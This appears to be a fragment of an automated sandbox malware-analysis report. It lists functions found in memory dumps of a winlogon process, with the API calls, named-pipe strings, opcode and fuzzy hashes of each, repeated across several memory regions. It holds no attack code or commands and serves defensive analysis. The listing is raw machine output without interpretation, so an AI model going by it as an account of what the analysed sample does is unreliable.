Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 72ca8a3ca2c797191b1185e72d0950ed6f6b3868902fa79715834b3bdb5aef3e
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 18018B32A40B94CAE715DF62A80459977A0FB88F84F868025EB4943718DE39E052C386

Function 000001CA7D1E14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E14C6
HeapFree.KERNEL32 ref: 000001CA7D1E14D5
GetProcessHeap.KERNEL32 ref: 000001CA7D1E14E2
HeapFree.KERNEL32 ref: 000001CA7D1E14F1
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1501

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 067d4f9d96a6597854837632812c8a5965103370f5823a428bd146fe93ab2a8e
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 3F01AD73A45B84CAF715DF62E80458877B0FB88F85B464025DF4A43718DF35E191C382

Function 000001CA7D2A28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2A28DF), ref: 000001CA7D2A2A12

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 883afdda5ac88cf6514580bd6892867edb55701f6eb5cb203455b40a889b7c34
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 5E91F233A5075999FB528F659450BEE37A0FF94B8CF846106DE0A6BA85DB36C04783C3

Function 000001CA7D2228F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D2228DF), ref: 000001CA7D222A12

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 68b43c0824a30f871ee081a9c83458cb90aaee78de66b724d65557e9164a7766
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 0791E033A5075899FB628F659850BED3BA0BF54B8CF854106EE0A57A94CA37D047C3CB

Function 000001CA7D1F28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001CA7D1F28DF), ref: 000001CA7D1F2A12

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 5eb7d5947bc20cfa67c7895d0bc5de5f10d0b69c3d0a7686c240678f5a04625b
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: E391EF33F5275899FB62CF659450BED3BA0BB54B8CF844146DE0A93A85DB36C446C383

Function 000001CA7D298090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001CA7D2980BC
GetCurrentThreadId.KERNEL32 ref: 000001CA7D2980CA
GetCurrentProcessId.KERNEL32 ref: 000001CA7D2980D6
QueryPerformanceCounter.KERNEL32 ref: 000001CA7D2980E6

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 309fc4a10813a887c16493d1ce2c5572945cc3e6c6069e0ff5507602679b0d55
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 99111836B50F088AFB01CB60E8547AA33A4FB59758F840E21DE6D967A4EB78C15583C2

Function 000001CA7D218090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001CA7D2180BC
GetCurrentThreadId.KERNEL32 ref: 000001CA7D2180CA
GetCurrentProcessId.KERNEL32 ref: 000001CA7D2180D6
QueryPerformanceCounter.KERNEL32 ref: 000001CA7D2180E6

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: e1da5454589ae589727566414135aba046387261922def3505f63e54200d3d87
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: A8115736B50F088AFB00CF60E8547A833A4FB58758F840E21EA2D867A8DF78D15583C2

Function 000001CA7D2927E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D2928CC
StrCpyW.SHLWAPI ref: 000001CA7D2928E5

Part of subcall function 000001CA7D293F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D29272F), ref: 000001CA7D293FA0

Strings

\\.\pipe\, xrefs: 000001CA7D2928D7

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: a1ec85385bb10c050ff026c888441d939cb2e74fe620a6861c714d04218da524
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 0371C037A84B8956F7369E26D940BEA7794FF84789FD10016DD0963B88DA36C50287C3

Function 000001CA7D2127E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D2128CC
StrCpyW.SHLWAPI ref: 000001CA7D2128E5

Part of subcall function 000001CA7D213F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D21272F), ref: 000001CA7D213FA0

Strings

\\.\pipe\, xrefs: 000001CA7D2128D7

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 8d43051fae0432339c287c2151160f3a64fceb99f59810b575694d931f32b1a0
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 5371F733A8474591FB369E2A9841BEA7794FF44788F90801AED0953B84DE37C606C7C3

Function 000001CA7D1E27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D1E28CC
StrCpyW.SHLWAPI ref: 000001CA7D1E28E5

Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0

Strings

\\.\pipe\, xrefs: 000001CA7D1E28D7

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 5d50e4c69690dc07a888c6352a7c53a26a02212cebad6fb895a16883e0e52a6b
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: C371C537A40B9951F7369E26D864BEA7794FB84B8AF85101ADD0943B88DE76C600C783

Function 000001CA7D1B80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1B80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D1B8162

Strings

csm, xrefs: 000001CA7D1B8149

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: fd78e535435ffec6a742ccc5ca62527ce80d22f415176f15bbae23ba0b9d84d4
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6C518133B52B088AFB55DF15D444FA83391FB44F9CF954129AA4D47B88D77AC841C782

Function 000001CA7D1B9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001CA7D1B9BA7

Strings

MOC, xrefs: 000001CA7D1B9B6F
RCC, xrefs: 000001CA7D1B9B77

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: b460edc10a65c72ae55a20d42f54f48aa37f6c81a21e5efe8d7f1e1a140c3131
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 9161A333908BC882E7729F15E440BDAB7A0FB85B98F444215EB9C47B99CB79D191CB42

Function 000001CA7D2925DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D2926C2
StrCpyW.SHLWAPI ref: 000001CA7D2926D9

Strings

\\.\pipe\, xrefs: 000001CA7D2926CD

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: d06f1d6a4c4548bdff1e7c612d8bf8de8a9f368b65ed0bfbfd455b76740dd300
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 30511637A8878841F626CE26A454BEA7751FF84789FC60025ED4973B89DA37C406C7C3

Function 000001CA7D2125DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D2126C2
StrCpyW.SHLWAPI ref: 000001CA7D2126D9

Strings

\\.\pipe\, xrefs: 000001CA7D2126CD

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 1df65754e96209d10ce77b496f8102a845f38ec8baad36118dacfef27c9bbe4a
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: B8511537A84389C1FA268E25A455BEB7751FF84788F948229ED4903B89DA37C403C7C3

Function 000001CA7D1E25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D1E26C2
StrCpyW.SHLWAPI ref: 000001CA7D1E26D9

Strings

\\.\pipe\, xrefs: 000001CA7D1E26CD

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3

Function 000001CA7D2A2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001CA7D2A2778
GetLastError.KERNEL32 ref: 000001CA7D2A279D

Strings

U, xrefs: 000001CA7D2A2722

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 2c1d7f038cfc8afa535b49b84af1afe38805e8b2e7a7ce4dff7cd2b815606423
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: E1410973A15B8886F751CF25E804BDAB7A0FB88788F844021EE4D9B744EB39C502C7C2

Function 000001CA7D222660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001CA7D222778
GetLastError.KERNEL32 ref: 000001CA7D22279D

Strings

U, xrefs: 000001CA7D222722

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: d46591c1412a96a10cecd863ef609a76f42ec2867853ab4bfb7008d3bc80fece
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 7341C633A1578886F7218F25E444BDAB7A4FB58788F854121FA4D87754EB3AD402C7C6

Function 000001CA7D1F2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001CA7D1F2778
GetLastError.KERNEL32 ref: 000001CA7D1F279D

Strings

U, xrefs: 000001CA7D1F2722

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 168bd5042619de978051ce00469c6fab8e07dcb428ef58c1d872ee4ec8472086
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: A741F633A16B8886F711DF65E404BD9B7A0FB98798FC04121EE8D87758EB39C441CB82

Function 000001CA7D299178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001CA7D2991C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001CA7D2987F7), ref: 000001CA7D299209

Strings

csm, xrefs: 000001CA7D2991F6

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 4851d813fab70bc34ea02260f48b8835ec91dfadefddb3b7f09ec63637b0023d
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: B9115E32614B4482EB218B15F40468A77E5FBC8B98FA84224EE8D07B58DF3DC552CB81

Function 000001CA7D219178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001CA7D2191C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001CA7D2187F7), ref: 000001CA7D219209

Strings

csm, xrefs: 000001CA7D2191F6

Memory Dump Source

